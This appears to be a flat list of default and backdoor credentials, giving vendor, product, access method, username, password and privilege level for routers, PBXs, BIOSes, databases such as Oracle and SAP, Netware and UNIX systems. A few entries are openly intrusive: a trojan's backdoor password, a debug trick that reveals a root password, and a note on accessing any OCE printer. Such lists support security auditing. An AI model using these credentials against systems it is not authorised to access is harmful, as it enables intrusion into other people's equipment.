Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL MAIL
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL REMOTE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL TELESUP
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL HPOFFICE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL MPE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER TCH
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER SECURITY
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER ITF3000
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER HPOFFICE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER COGNOS
Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER TELESUP
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGE VESOFT
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGE VESOFT
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR SYS
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CAROLIAN
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR VESOFT
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR XLSERVER
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR SECURITY
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR TELESUP
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPDESK
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CCC
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CNAS
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR WORD
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR COGNOS
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR ROBELLE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPOFFICE
Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPONLY
hp sa7200 Multi admin admin Admin
hp sa7200 Multi admin (none) Admin
IBM VM/CMS Multi DEMO2 (none)
IBM VM/CMS Multi DEMO3 (none)
IBM VM/CMS Multi DEMO4 (none)
IBM VM/CMS Multi DIRECT (none)
IBM VM/CMS Multi DIRMAINT (none)
IBM VM/CMS Multi DISKCNT (none)
IBM VM/CMS Multi EREP (none)
IBM VM/CMS Multi FSFADMIN (none)
IBM VM/CMS Multi FSFTASK1 (none)
IBM VM/CMS Multi FSFTASK2 (none)
IBM VM/CMS Multi GCS (none)
IBM VM/CMS Multi IDMS (none)
IBM VM/CMS Multi IDMSSE (none)
IBM VM/CMS Multi IIPS (none)
IBM VM/CMS Multi IPFSERV (none)
IBM VM/CMS Multi ISPVM (none)
IBM VM/CMS Multi IVPM1 (none)
IBM VM/CMS Multi IVPM2 (none)
IBM VM/CMS Multi MAINT (none)
IBM VM/CMS Multi MOESERV (none)
IBM VM/CMS Multi NEVIEW (none)
IBM VM/CMS Multi OLTSEP (none)
IBM VM/CMS Multi OP1 (none)
IBM VM/CMS Multi OPERATNS (none)
IBM VM/CMS Multi OPERATOR (none)
IBM VM/CMS Multi PDMREMI (none)
IBM VM/CMS Multi PENG (none)
IBM VM/CMS Multi PROCAL (none)
IBM VM/CMS Multi PRODBM (none)
IBM VM/CMS Multi PROMAIL (none)
IBM VM/CMS Multi PSFMAINT (none)
IBM VM/CMS Multi PVM (none)
IBM VM/CMS Multi RDM470 (none)
IBM VM/CMS Multi ROUTER (none)
IBM VM/CMS Multi RSCS (none)
IBM VM/CMS Multi RSCSV2 (none)
IBM VM/CMS Multi SAVSYS (none)
IBM VM/CMS Multi SFCMI (none)
IBM VM/CMS Multi SFCNTRL (none)
IBM VM/CMS Multi SMART (none)
IBM VM/CMS Multi SQLDBA (none)
IBM VM/CMS Multi SQLUSER (none)
IBM VM/CMS Multi SYSADMIN (none)
IBM VM/CMS Multi SYSCKP (none)
IBM VM/CMS Multi SYSDUMP1 (none)
IBM VM/CMS Multi SYSERR (none)
IBM VM/CMS Multi SYSWRM (none)
IBM VM/CMS Multi TDISK (none)
IBM VM/CMS Multi TEMP (none)
IBM VM/CMS Multi TSAFVM (none)
IBM VM/CMS Multi VASTEST (none)
IBM VM/CMS Multi VM3812 (none)
IBM VM/CMS Multi VMARCH (none)
IBM VM/CMS Multi VMASMON (none)
IBM VM/CMS Multi VMASSYS (none)
IBM VM/CMS Multi VMBACKUP (none)
IBM VM/CMS Multi VMBSYSAD (none)
IBM VM/CMS Multi VMMAP (none)
IBM VM/CMS Multi VMTAPE (none)
IBM VM/CMS Multi VMTLIBR (none)
IBM VM/CMS Multi VMUTIL (none)
IBM VM/CMS Multi VSEIPO (none)
IBM VM/CMS Multi VSEMAINT (none)
IBM VM/CMS Multi VSEMAN (none)
IBM VM/CMS Multi VTAM (none)
IBM VM/CMS Multi VTAMUSER (none)
IBM 8237 Multi I5rDv2b2JjA8Mm A52896nG93096a Admin
IBM 8225 Multi I5rDv2b2JjA8Mm A52896nG93096a Admin
IBM AIX Multi guest (none) User
IBM AIX Multi guest guest User
IBM Ascend OEM Routers Telnet n/a ascend Admin
IBM OS/400 Multi 11111111 11111111
IBM OS/400 Multi 22222222 22222222
IBM OS/400 Multi ibm password
IBM OS/400 Multi ibm 2222
IBM OS/400 Multi ibm service
IBM OS/400 Multi qpgmr qpgmr
IBM OS/400 Multi qsecofr qsecofr
IBM OS/400 Multi qsecofr 11111111
IBM A21m Multi n/a (none) Admin
IBM 390e Multi n/a admin Admin
ibm a20m Multi n/a admin Admin
IBM OS/400 Multi qsecofr 22222222
IBM OS/400 Multi qserv qserv
IBM OS/400 Multi qsrv qsrv
IBM OS/400 Multi qsrvbas qsrvbas
IBM OS/400 Multi qsvr qsvr
IBM OS/400 Multi qsvr ibmcel
IBM OS/400 Multi qsysopr qsysopr
IBM OS/400 Multi quser quser
IBM OS/400 Multi secofr secofr
IBM AIX 4.X Multi admin admin User
IBM PC BIOS Console n/a IBM Admin
IBM PC BIOS Console n/a MBIU0 Admin
IBM PC BIOS Console n/a sertafu Admin
ibm 600x Multi n/a admin Admin
IBM POS CMOS Console ESSEX
IBM POS CMOS Console IPC
IBM VM/CMS Multi $ALOC$ (none)
IBM VM/CMS Multi ADMIN (none)
IBM VM/CMS Multi AP2SVP (none)
IBM VM/CMS Multi APL2PP (none)
IBM VM/CMS Multi AUTOLOG1 (none)
IBM VM/CMS Multi BATCH (none)
IBM VM/CMS Multi BATCH1 (none)
IBM VM/CMS Multi BATCH2 (none)
IBM VM/CMS Multi CCC (none)
IBM VM/CMS Multi CM**ATCH (none)
IBM VM/CMS Multi CMSUSER (none)
IBM VM/CMS Multi CPNUC (none)
IBM VM/CMS Multi CPRM (none)
IBM VM/CMS Multi CSPUSER (none)
IBM VM/CMS Multi CVIEW (none)
IBM VM/CMS Multi DATAMOVE (none)
IBM VM/CMS Multi DEMO1 (none)
Intel Shiva Multi root (none) Admin
Intel Express 9520 Router Multi NICONEX NICONEX User
Intel Shiva Lanrovers Multi root (none) Admin
Intel Shiva Multi Guest (none) User
intel NetporrExpress Multi (none) (none) Admin
Intel Express 520T Switch Multi setup setup User
intel lan rover 6.7 Console root admin Admin
Interbase Interbase Database Server All Multi SYSDBA masterkey Admin
intex organizer Multi n/a (none) Admin
iso sistemi winwork Multi n/a (none) Admin
Iwill PC BIOS Console n/a iwill Admin
JD Edwards WorldVision/OneWorld All(?) Console JDE JDE Admin/SECOFR
JDS Microprocessing Hydra 3000 r2.02 Console hydrasna (none) Admin http://www.hydrasystems.com/h3kdocs/H3R25C04.pdf
Jetform Jetform Design HTTP Jetform (none) Admin
JetWay PC BIOS Console n/a spooml Admin
Joss Technology PC BIOS Console n/a technolgi Admin
Joss Technology PC BIOS Console n/a 57gbzb Admin
kaptest usmle HTTP admin (none) Admin
Kyocera EcoLink 7.2 HTTP n/a PASSWORD Admin
Kyocera Telnet Server IB-20/21 multi root root Admin
Lantronics Lantronics Terminal Server TCP 7000 n/a access Admin
Lantronics Lantronics Terminal Server TCP 7000 n/a system Admin
Lantronix Lantronix Terminal TCP 7000 n/a lantronix Admin
Leading Edge PC BIOS Console n/a MASTER Admin
Linksys DSL Telnet n/a admin Admin
Linksys EtherFast Cable/DSL ROuter Multi Administrator admin Admin
Linksys Linksys Router DSL/Cable HTTP (none) admin Admin
Linux Slackware Multi snake (none) User
Linux Slackware Multi satan (none) User
Linux UCLinux for UCSIMM Multi root uClinux Admin
Linux Slackware Multi gonzo (none) User
Livingston IRX Router Telnet !root (none)
Livingston Livingston Portmaster 3 Telnet !root (none)
Livingston Officerouter Telnet !root (none)
Lucent System 75 Multi browse looker
Lucent System 75 Multi craft craft
Lucent System 75 Multi craft craftpw
Lucent System 75 Multi craft craftpw
Lucent System 75 Multi cust custpw
Lucent System 75 Multi enquiry enquirypw
Lucent System 75 Multi field support
Lucent System 75 Multi inads indspw
Lucent System 75 Multi inads indspw
Lucent System 75 Multi inads inads
Lucent System 75 Multi init initpw
Lucent System 75 Multi locate locatepw
Lucent System 75 Multi maint maintpw
Lucent System 75 Multi maint rwmaint
Lucent System 75 Multi nms nmspw
Lucent System 75 Multi rcust rcustpw
Lucent System 75 Multi support supportpw
Lucent System 75 Multi tech field
Lucent B-STDX9000 Multi (any 3 characters) cascade
Lucent B-STDX9000 debug mode n/a cascade
Lucent B-STDX9000 SNMP readwrite n/a cascade
Lucent CBX 500 Multi (any 3 characters) cascade
Lucent CBX 500 debug mode n/a cascade
Lucent CBX 500 SNMP readwrite n/a cascade
Lucent GX 550 Multi (any 3 characters) cascade
Lucent GX 550 debug mode n/a cascade
Lucent GX 550 SNMP readwrite n/a cascade
Lucent MAX-TNT Multi admin Ascend
Lucent PSAX 1200 and below Multi root ascend
Lucent PSAX 1250 and above Multi readwrite lucenttech1
Lucent PSAX 1250 and above Multi readonly lucenttech2
Lucent System 75 Multi bciim bciimpw
Lucent System 75 Multi bcim bcimpw
Lucent System 75 Multi bcms bcmspw
Lucent System 75 Multi bcms bcmspw
Lucent System 75 Multi bcnas bcnaspw
Lucent System 75 Multi blue bluepw
Lucent System 75 Multi browse browsepw
M Technology PC BIOS Console n/a mMmM Admin
MachSpeed PC BIOS Console n/a sp99dd Admin
Macromedia Dreamweaver FTP n/a admin Guest
Magic-Pro PC BIOS Console n/a prost Admin
Megastar PC BIOS Console n/a star Admin
Mentec Micro/RSX Multi MICRO RSX Admin
MERCURY 234234 234234 SNMP Administrator admin Admin
MERCURY KT133A/686B SNMP Administrator admin Admin
Micron PC BIOS Console n/a sldkj754 Admin
Micron PC BIOS Console n/a xyzall Admin
Micronics PC BIOS Console n/a dn_04rjc Admin
Microplex Print Server Telnet root root Admin
microRouter 900i Console/Multi n/a letmein Admin
Microsoft Windows NT Multi Guest (none) User
Microsoft Windows NT Multi User User User
Microsoft SQL Server Multi sa (none)
Microsoft Windows NT Multi Guest Guest User
Microsoft Windows NT Multi IS_$hostname (same) User hostname = your server name
Microsoft Windows NT Multi (null) (none) User Redbutton Hole
Microsoft Windows NT Multi Administrator Administrator Admin
Microsoft Windows NT Multi Administrator (none) Admin
Mintel Mintel PBX n/a SYSTEM Admin
Motorola Cablerouter Telnet cablecom router Admin
mro software maximo v4.1 Multi SYSADM sysadm Admin
NCR NCR UNIX Multi ncrm ncrm Admin
Netgear RT314 HTTP and Telnet admin 1234 Admin
NetGenesis NetAnalysis Web Reporting HTTP naadmin naadmin Admin
Netopia Netopia 9500 Telnet netopia netopia Admin
Netopia Netopia 7100 Telnet (none) (none) Admin
Netport Express 10/100 multi setup setup Admin
Netscreen ns-25 Multi n/a (none) Admin
Netscreen Firewall multi netscreen netscreen Admin
NeXT NeXTStep Multi signa signa User
NeXT NeXTStep Multi me (none) User
NeXT NeXTStep Multi root NeXT Admin
Nimble PC BIOS Console n/a xdfk9874t3 Admin
Nortel Meridian Link Multi disttech 4tas engineer account
Nortel Meridian Link Multi maint maint Maintenance account
Nortel Meridian Link Multi mlusr mlusr user account
Nortel Remote Office 9150 Client admin root Admin
Nortel Accelar (Passport) 1000 series routing switches Multi l2 l2 Layer 2 Read Write
Nortel Accelar (Passport) 1000 series routing switches Multi l3 l3 Layer 3 (and layer 2) Read Write
Nortel Accelar (Passport) 1000 series routing switches Multi ro ro Read Only
Nortel Accelar (Passport) 1000 series routing switches Multi rw rw Read Write
Nortel Accelar (Passport) 1000 series routing switches Multi rwa rwa Read Write All
Nortel Extranet Switches Multi admin setup Admin
Nortel Baystack 350-24T Telnet n/a secure Admin
Nortel Meridian PBX Serial login 0000 AUTH codes in LD 8
Nortel Meridian PBX Serial login 1111 AUTH codes in LD 8
Nortel Meridian PBX Serial login 8429 AUTH codes in LD 8
Nortel Meridian PBX Serial spcl 0000 AUTH codes in LD 8
Nortel Meridian MAX Multi service smile general engineer account
Nortel Meridian MAX Multi root 3ep5w2u Admin
Nortel Matra 6501 PBX Console (none) 0000 Admin
Nortel Meridian MAX Multi maint ntacdmax Maintenance account
Nortel Meridian CCR Multi service smile general engineer account
Nortel Meridian CCR Multi disttech 4tas engineer account enter 3letter of day from yesterday an tomorrow (for Tuesday enter MonWed case sensitive) - may be twice to see root password in clear
Nortel Meridian CCR Multi maint maint Maintenance account
Nortel Meridian CCR Multi ccrusr ccrusr User account
Nortel Meridian Multi n/a (none) Admin
Nortel Meridian Link Multi service smile general engineer account
Novell Netware Multi BACKUP BACKUP
Novell Netware Multi CHEY_ARCHSVR CHEY_ARCHSVR
Novell Netware Multi CHEY_ARCHSVR (none)
Novell Netware Multi FAX FAX
Novell Netware Multi FAX (none)
Novell Netware Multi FAXUSER FAXUSER
Novell Netware Multi FAXUSER (none)
Novell Netware Multi FAXWORKS (none)
Novell Netware Multi FAXWORKS FAXWORKS
Novell Netware Multi GATEWAY GATEWAY
Novell Netware Multi GATEWAY GATEWAY
Novell Netware Multi GATEWAY (none)
Novell Netware Multi GUEST TSEUG
Novell Netware Multi GUEST GUESTGUEST
Novell Netware Multi GUEST GUESTGUE
Novell Netware Multi GUEST GUEST
Novell Netware Multi GUEST (none)
Novell Netware Multi HPLASER (none)
Novell Netware Multi HPLASER HPLASER
Novell Netware Multi LASER (none)
Novell Netware Multi LASER LASER
Novell Netware Multi LASERWRITER LASERWRITER
Novell Netware Multi LASERWRITER (none)
Novell Netware Multi MAIL (none)
Novell iChain 1.5 Console (none) san fran 8 Admin Debug level access
Novell iChain 2.0 Console (none) cr0wmt 911 Admin Debug level access
Novell Netware Multi MAIL MAIL
Novell Netware Multi POST (none)
Novell Netware Multi POST POST
Novell Netware Multi PRINT (none)
Novell Netware Multi PRINT PRINT
Novell Netware Multi PRINTER (none)
Novell Netware Multi PRINTER PRINTER
Novell Netware Multi ROOT (none)
Novell Netware Multi ROOT ROOT
Novell Netware Multi ROUTER (none)
Novell Netware Multi SABRE (none)
Novell Netware Multi SUPERVISOR NETFRAME
Novell Netware Multi SUPERVISOR NFI
Novell Netware Multi SUPERVISOR NF
Novell Netware Multi SUPERVISOR HARRIS
Novell Netware Multi SUPERVISOR SUPERVISOR
Novell Netware Multi SUPERVISOR (none)
Novell Netware Multi SUPERVISOR SYSTEM
Novell Netware Multi TEST TEST
Novell Netware Multi TEST (none)
Novell Netware Multi USER_TEMPLATE (none)
Novell Netware Multi USER_TEMPLATE USER_TEMPLATE
Novell Netware Multi WANGTEK (none)
Novell Netware Multi WANGTEK WANGTEK
Novell Netware Multi WINDOWS_PASSTHRU WINDOWS_PASSTHRU
Novell Netware Multi WINDOWS_PASSTHRU (none)
Novell Netware Multi WINSABRE SABRE
Novell Netware Multi WINSABRE WINSABRE
Novell Groupwise 5.5 Enhancement Pack HTTP servlet manager Servlet Mgr URI: /servlet/ServletManager
Novell Groupwise 6.0 HTTP servlet manager Servlet Mgr URI: /servlet/ServletManager
Novell Netware Multi ADMIN ADMIN
Novell Netware Multi ADMIN (none)
Novell Netware Multi ARCHIVIST (none)
Novell Netware Multi ARCHIVIST ARCHIVIST
Novell Netware Multi BACKUP (none)
Nurit PC BIOS Console $system (none) Admin
OCE Printers Hardware HTTP n/a 0 and the number of OCE printer Admin You can gain acsess to every OCE printer..
OCE Printers Hardware HTTP n/a 0 and the number of OCE printer Admin You can gain acsess to every OCE printer..
Optus Counter-Strike 1.3 Multi Administrator admin Admin password
Oracle Oracle RDBMS 8i Multi AQDEMO AQDEMO
Oracle Oracle RDBMS 7 and 8 Multi APPS APPS
oracle 8.1.7 Multi n/a (none) Admin
Oracle Oracle RDBMS 7 and 8 Multi AURORA@ORB@UNAUTHENTICATED INVALID
Oracle Oracle RDBMS 7 and 8 Multi AURORA$ORB$UNAUTHENTICATED INVALID
Oracle Web DB HTTP webdb webdb Admin Running on port 81/TCP (Nicolas Gregoire)
Oracle Oracle RDBMS 7 and 8 Multi BLAKE PAPER
Oracle Oracle RDBMS 8i Multi CATALOG CATALOG
Oracle Oracle RDBMS 8i Multi CDEMO82 CDEMO82
Oracle Oracle RDBMS 8i Multi CDEMOCOR CDEMOCOR
Oracle Oracle RDBMS 8i Multi CDEMOUCB CDEMOUCB
Oracle Oracle RDBMS 8i Multi CDEMORID CDEMORID
Oracle Oracle RDBMS 8i Multi FINANCE FINANCE All Privileges
Oracle Oracle RDBMS 7 and 8 Multi CLARK CLOTH
Oracle Oracle RDBMS 8i Multi COMPANY COMPANY All Privileges
Oracle Oracle RDBMS 7 and 8 Multi CTXDEMO CTXDEMO
Oracle Oracle RDBMS 7 and 8 Multi CTXSYS CTXSYS DBA
Oracle Oracle RDBMS 8i Multi SYSMAN oem_temp DBA created by Oracle Enterprise Manager
Oracle Oracle RDBMS 7 and 8 Multi CTXSYS (none)
Oracle Oracle RDBMS 7 and 8 Multi DBSNMP DBSNMP RESOURCE and CONNECT roles
Oracle Oracle RDBMS 7 and 8 Multi DEMO DEMO
Oracle Oracle RDBMS 8i Multi DEMO8 DEMO8
Oracle Oracle RDBMS 8i Multi EMP EMP
Oracle Oracle RDBMS 8i Multi EVENT EVENT DBA
Oracle Oracle RDBMS 8i Multi FND FND
Oracle Oracle RDBMS 8i Multi GPFD GPFD
Oracle Oracle RDBMS 8i Multi GPLD GPLD
Oracle Oracle RDBMS 7 and 8 Multi JONES STEEL
Oracle Oracle RDBMS 7 and 8 Multi MDSYS MDSYS All Privileges with Admin
Oracle Oracle RDBMS 8i Multi MFG MFG All Privileges
Oracle Oracle RDBMS 8i Multi MILLER MILLER
Oracle Oracle RDBMS 8i Multi MMO2 MMO2
Oracle Oracle RDBMS 8i Linux Multi MODTEST YES DBA
Oracle Oracle RDBMS 8i Multi MOREAU MOREAU
Oracle Oracle RDBMS 8i WinNT Multi MTYSYS MTYSYS
Oracle Oracle RDBMS 7 and 8 Multi NAMES NAMES
Oracle Oracle RDBMS 8i Multi OCITEST OCITEST
Oracle Oracle RDBMS 7 and 8 Multi ORDPLUGINS ORDPLUGINS
Oracle Oracle RDBMS 7 and 8 Multi ORDSYS ORDSYS
Oracle Oracle RDBMS 7 and 8 Multi OUTLN OUTLN
Oracle Oracle RDBMS 8i Multi PO PO DBA
Oracle Oracle RDBMS 8i Multi POWERCARTUSER POWERCARTUSER
Oracle Oracle RDBMS 8i Multi PRIMARY PRIMARY
Oracle Oracle RDBMS 8i Multi PUBSUB PUBSUB DBA
Oracle Oracle RDBMS 8i WinNT Multi RE RE
Oracle Oracle RDBMS 8i WinNT Multi RMAIL RMAIL
Oracle Oracle RDBMS 7 and 8 Multi RMAN RMAN created by ordisys.sql
Oracle Oracle RDBMS 8i WinNT Multi SAMPLE SAMPLE DBA
Oracle Oracle RDBMS 7 and 8 Multi SCOTT TIGER
Oracle Oracle RDBMS 8i Multi SECDEMO SECDEMO
Oracle Oracle RDBMS 7 and 8 Multi SYS CHANGE_ON_INSTALL DBA +
Oracle Oracle RDBMS 7 and 8 Multi SYSADM SYSADM
Oracle Oracle RDBMS 7 and 8 Multi SYSTEM MANAGER
Oracle Oracle RDBMS 7 and 8 Multi TRACESRV TRACE
Oracle Oracle RDBMS 8i Multi TSDEV TSDEV
Oracle Oracle RDBMS 8i Multi TSUSER TSUSER
Oracle Oracle RDBMS 8i Multi USER0 USER0
Oracle Oracle RDBMS 8i Multi USER1 USER1
Oracle Oracle RDBMS 8i Multi USER2 USER2
Oracle Oracle RDBMS 8i Multi USER3 USER3
Oracle Oracle RDBMS 8i Multi USER4 USER4
Oracle Oracle RDBMS 8i Multi USER5 USER5
Oracle Oracle RDBMS 8i Multi USER6 USER6
Oracle Oracle RDBMS 8i Multi USER7 USER7
Oracle Oracle RDBMS 8i Multi USER8 USER8
Oracle Oracle RDBMS 8i Multi USER9 USER9
Oracle Oracle RDBMS 8i Multi VRR1 VRR1 DBA
Oracle Personal Oracle 8 Multi PO8 PO8
Oracle Oracle RDBMS 8i Multi AQUSER AQUSER
Oracle Oracle RDBMS 7 and 8 Multi ADAMS WOOD
Oracle Oracle RDBMS 7 and 8 Multi APPLSYS APPLSYS
Osicom NETPrint 1000E/D Telnet Manager Manager Admin
Osicom NETPrint 1000E/NDS Telnet Manager Manager Admin
Osicom JETXPrint 500 E/B Telnet sysadm sysadm Admin
Osicom NETPrint 2000E/N Telnet Manager Manager Admin
Osicom NETPrint 1500E/N Telnet Manager Manager Admin
Osicom NETPrint 1000E/NDS Telnet sysadm sysadm Admin
Osicom NETPrint 1500E/N Telnet sysadm sysadm Admin
Osicom NETPrint 2000E/N Telnet sysadm sysadm Admin
Osicom NETPrint 1000E/B Telnet sysadm sysadm Admin
Osicom NETPrint 2000E/B Telnet sysadm sysadm Admin
Osicom NETPrint 1000E/N Telnet sysadm sysadm Admin
Osicom NETPrint 2000E/N Telnet sysadm sysadm Admin
Osicom NETPrint 1000 T/B Telnet sysadm sysadm Admin
Osicom NETPrint 2000 T/B Telnet sysadm sysadm Admin
Osicom NETPrint 1000 T/N Telnet sysadm sysadm Admin
Osicom NETPrint 2000 T/N Telnet sysadm sysadm Admin
Osicom NETPrint 1500 E/B Telnet sysadm sysadm Admin
Osicom NETPrint 1500E/N Telnet sysadm sysadm Admin
Osicom NETPrint 1500T/N Telnet sysadm sysadm Admin
Osicom NETPrint 1000E/D Telnet sysadm sysadm Admin
Osicom NETPrint 500 E/B Telnet sysadm sysadm Admin
Osicom NETPrint 500 E/N Telnet sysadm sysadm Admin
Osicom NETPrint 500 T/B Telnet sysadm sysadm Admin
Osicom NETPrint 500 T/N Telnet sysadm sysadm Admin
Osicom Osicom Plus T1/PLUS 56k Telnet write private
Osicom JETXPrint 1000E/B Telnet sysadm sysadm Admin
Osicom JETXPrint 1000E/N Telnet sysadm sysadm Admin
Osicom JETXPrint 1000T/N Telnet sysadm sysadm Admin
Osicom NETCommuter Remote Access Server Telnet debug d.e.b.u.g User
Osicom NETCommuter Remote Access Server Telnet echo echo User
Osicom NETCommuter Remote Access Server Telnet guest guest User
Osicom NETCommuter Remote Access Server Telnet Manager Manager Admin
Osicom NETCommuter Remote Access Server Telnet sysadm sysadm Admin
Osicom NETPrint 1500 E/B Telnet debug d.e.b.u.g User
Osicom NETPrint 1000E/D Telnet debug d.e.b.u.g User
Osicom NETPrint 1000E/NDS Telnet debug d.e.b.u.g User
Osicom NETPrint 1500E/N Telnet debug d.e.b.u.g User
Osicom NETPrint 2000E/N Telnet debug d.e.b.u.g User
Osicom NETPrint 1500 E/B Telnet echo echo User
Osicom NETPrint 1000E/D Telnet echo echo User
Osicom NETPrint 1000E/NDS Telnet echo echo User
Osicom NETPrint 1500E/N Telnet echo echo User
Osicom NETPrint 2000E/N Telnet echo echo User
Osicom NETPrint 1500 E/B Telnet guest guest User
Osicom NETPrint 1000E/D Telnet guest guest User
Osicom NETPrint 1000E/NDS Telnet guest guest User
Osicom NETPrint 1500E/N Telnet guest guest User
Osicom NETPrint 2000E/N Telnet guest guest User
Osicom NETPrint 1500 E/B Telnet Manager Manager Admin
Pacific Micro Data MAST 9500 Universal Disk Array ESM ver. 2.11 / 1 Console pmd (none) Admin
Packard Bell PC BIOS Console n/a bell9 Admin
PentaSafe VigilEnt Security Manager 3.0 VigilEnt Security Manager Console PSEAdmin $secure$ Admin
phoenix 4.0 6.0.2 Multi n/a admin Admin
Planet WAP-1900/1950/2000 2.5.0 Multi (none) default Admin
Prime PrimeOS Multi test test User
Prime PrimeOS Multi netlink netlink User
Prime PrimeOS Multi mfd mfd User
Prime PrimeOS Multi guest guest User
Prime PrimeOS Multi mail mail User
Prime PrimeOS Multi guest1 guest User
Prime PrimeOS Multi guest1 guest1 User
Prime PrimeOS Multi system prime Admin
Prime PrimeOS Multi system system Admin
Prime PrimeOS Multi tele tele User
Prime PrimeOS Multi prime prime User
Prime PrimeOS Multi primenet primenet User
Prime PrimeOS Multi primenet primeos User
Prime PrimeOS Multi primos_cs primos User
Prime PrimeOS Multi primos_cs prime User
Pyramid Computer BenHur all HTTP admin gnumpf Admin
QDI SpeedEasy BIOS Console n/a lesarotl Admin
QDI PC BIOS Console n/a QDI Admin
Quantex PC BIOS Console n/a teX1 Admin
Quantex PC BIOS Console n/a xljlbj Admin
Raidzone raid arrays n/a raidzone
Ramp Networks WebRamp wradmin trancell
RedHat Redhat 6.2 HTTP piranha q User
RedHat Redhat 6.2 HTTP piranha piranha User
Research PC BIOS Console n/a Col2ogro2 Admin
RM RM Connect Multi setup changeme
RM RM Connect Multi teacher password
RM RM Connect Multi temp1 password
RM RM Connect Multi admin rmnetlm
RM RM Connect Multi admin2 changeme
RM RM Connect Multi adminstrator changeme
RM RM Connect Multi deskalt password
RM RM Connect Multi deskman changeme
RM RM Connect Multi desknorm password
RM RM Connect Multi deskres password
RM RM Connect Multi guest (none)
RM RM Connect Multi replicator replicator
RM RM Connect Multi RMUser1 password
RM RM Connect Multi topicalt password
RM RM Connect Multi topicnorm password
RM RM Connect Multi topicres password
RM Server BIOS Console n/a RM
SAP SAP SAP client EARLYWATCH SUPPORT SAP internal; Mandant 066
SAP SAP SAP client SAP* 07061992 SAP internal; Mandant 066
SAP SAP SAP client SAP* PASS SAP internal; all Mandants
SAP SAP SAP client SAP* 07061992 SAP internal; Mandant 000
SAP SAP SAP client DDIC 19920706 SAP internal; Mandant 000
SAP SAP SAP client SAP* 07061992 SAP internal; Mandant 001
SAP SAP SAP client DDIC 19920706 SAP internal; Mandant 001
Semaphore PICK O/S PHANTOM
Semaphore PICK O/S DS
Semaphore PICK O/S DSA
Semaphore PICK O/S DESQUETOP
Server Technology Sentry Remote Power Manager Multi GEN1 gen1 view/control Telnet port 2001
Server Technology Sentry Remote Power Manager Multi GEN2 gen2 view/control Telnet port 2001
Server Technology Sentry Remote Power Manager Multi ADMN admn Admin Telnet port 2001
Shiva Integrator 150/200/500 Multi admin hello Admin
Shuttle PC BIOS n/a Spacve Admin
Siemens ROLM PBX eng engineer
Siemens ROLM PBX op op
Siemens ROLM PBX op operator
siemens hipath Multi n/a (none) Admin
Siemens ROLM PBX su super
Siemens PhoneMail poll tech
Siemens PhoneMail sysadmin sysadmin
Siemens ROLM PBX admin pwp
Siemens PhoneMail tech tech
Siemens Nixdorf PC BIOS Console n/a SKY_FOX Admin
Siips Trojan 8974202 Multi Administrator ganteng Admin Thx
Silicon Graphics IRIX 5.x 6.x Multi lp (none) CLI; UID lp
Silicon Graphics IRIX 5.x 6.x Multi guest (none) CLI; UID guest
Silicon Graphics IRIX Multi OutOfBox (none) Admin
Silicon Graphics IRIX Multi field field Admin
Silicon Graphics IRIX Multi tour tour Admin
Silicon Graphics IRIX Multi tutor (none) Admin
Silicon Graphics IRIX Multi tutor tutor Admin
Silicon Graphics IRIX Multi 4Dgifts 4Dgifts Admin
Silicon Graphics IRIX Multi 4Dgifts (none) Admin
Silicon Graphics IRIX Multi demos (none) Admin
Silicon Graphics IRIX Multi Ezsetup (none) Admin
SmartSwitch Router 250 ssr2500 v3.0.9 Multi admin (none) Admin
SonicWALL ALL ALL HTTP admin password Admin
Speedstream 5861 SMT Router Multi admin admin Admin
Speedstream 5871 IDSL Router Multi admin admin Admin
Speedstream Router 250 ssr250 Multi admin admin Admin
Speedstream DSL Multi admin admin Admin
SpeedXess HASE-120 Multi (none) speedxess Admin
Sun JavaWebServer 1.x 2.x AdminSrv admin admin Admin
SuperMicro PC BIOS Console n/a ksdjfg934t Admin
Sybase Adaptive Server Enterprise 11.x 12.x Multi sa (none) SA and SSO roles
Tiara Networks (router???) 1400 6100 6200 Multi n/a tiara tiaranet
Tinys PC BIOS Console n/a Tiny Admin
TMC PC BIOS Console n/a BIGO Admin
Toshiba PC BIOS Console n/a 24Banc81 Admin
Toshiba PC BIOS Console n/a Toshiba Admin
Toshiba PC BIOS Console n/a toshy99 Admin
Trend Micro Viruswall all versions HTTP on port 1812 admin admin Admin Reported by Nicolas Gregoire
TVT System Expresse G5 Multi craft (none) Admin
TVT System Expresse G5 DS1 Module Multi (none) enter Admin
UNIX Generic Multi system_admin system_admin Admin
UNIX Generic Multi trouble trouble User
UNIX Generic Multi umountfs umountfs User
UNIX Generic Multi umountfsys umountfsys User
UNIX Generic Multi umountsys umountsys User
UNIX Generic Multi unix unix User
UNIX Generic Multi user user User
UNIX Generic Multi uucp uucp User
UNIX Generic Multi uucpadm uucpadm User
UNIX Generic Multi web (none) User
UNIX Generic Multi web web User
UNIX Generic Multi webmaster webmaster User
UNIX Generic Multi webmaster (none) User
UNIX Generic Multi www (none) User
UNIX Generic Multi www www User
UNIX Generic Multi adm adm Admin
UNIX Generic Multi adm (none) Admin
UNIX Generic Multi admin admin User
UNIX Generic Multi administrator administrator User
UNIX Generic Multi administrator (none) User
UNIX Generic Multi anon anon User
UNIX Generic Multi bbs bbs User
UNIX Generic Multi bbs (none) User
